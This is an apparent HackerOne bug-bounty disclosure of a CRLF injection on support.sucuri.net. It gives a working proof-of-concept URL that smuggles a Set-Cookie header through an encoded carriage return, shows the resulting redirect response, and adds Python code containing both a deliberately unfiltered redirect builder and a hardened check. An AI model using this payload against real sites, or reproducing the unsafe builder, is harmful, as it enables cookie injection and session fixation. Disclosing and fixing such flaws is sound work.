Sucuri: [support.sucuri.net] CRLF Injection

2016-06-14T20:03:14
ID H1:144769
Type hackerone
Reporter bobrov
Modified 2016-10-24T22:25:33

Description

PoC (any browser except Firefox): http://support.sucuri.net/%23%0dSet-Cookie:crlf=injection;domain=.sucuri.net;

The %0d in the path is decoded to a bare carriage return and copied into the Location header of the 301 redirect, so a client that accepts a lone \r as a line terminator sees a second header:

HTTP Response:

HTTP/1.1 301 Moved Permanently
Date: Tue, 14 Jun 2016 19:56:14 GMT
Server: Apache
Location: https://support.sucuri.net/#   <= injection: bare \r here, followed by
Set-Cookie:crlf=injection;domain=.sucuri.net;

This vulnerability could be chained with others, for example XSS via cookie or session fixation.
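Added example (not code from the report or from Sucuri): it reproduces how the decoded path from the PoC above turns into an extra header for a client that treats a bare \r as a line break, and shows the check a redirect handler should apply before emitting the Location header. The redirect base, the function names and the lenient-client parser are assumptions for illustration.

```python
from urllib.parse import quote, unquote

REDIRECT_BASE = "https://support.sucuri.net"  # assumed redirect target prefix

# Path from the report's PoC, as the server receives it before decoding.
POC_PATH = "/%23%0dSet-Cookie:crlf=injection;domain=.sucuri.net;"


def header_value_is_safe(value: str) -> bool:
    """RFC 7230 header field values may not contain CR, LF or other
    control characters; any of them lets a client see a new header line."""
    return not any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value)


def location_header_unsafe(request_path: str) -> str:
    """Mirrors the reported behaviour: the decoded path is concatenated
    into the Location value with no filtering (do not use)."""
    return REDIRECT_BASE + unquote(request_path)


def location_header_safe(request_path: str) -> str:
    """Hardened variant: reject control characters after decoding, then
    re-encode the path so the emitted header line cannot be split."""
    decoded = unquote(request_path)
    if not header_value_is_safe(decoded):
        raise ValueError("CR/LF or control character in redirect target")
    return REDIRECT_BASE + quote(decoded, safe="/#?=&:@")


def safe_builder_rejects(request_path: str) -> bool:
    """True when the hardened builder refuses the given request path."""
    try:
        location_header_safe(request_path)
    except ValueError:
        return True
    return False


def headers_seen_by_lenient_client(header_block: str) -> dict:
    """Parse headers the way a client that accepts a bare CR as a line
    terminator does; this is why the injected Set-Cookie is honoured
    by most browsers but not by one that requires CRLF."""
    seen = {}
    normalized = header_block.replace("\r\n", "\n").replace("\r", "\n")
    for line in normalized.split("\n"):
        if ":" in line:
            name, _, value = line.partition(":")
            seen.setdefault(name.strip().lower(), []).append(value.strip())
    return seen
```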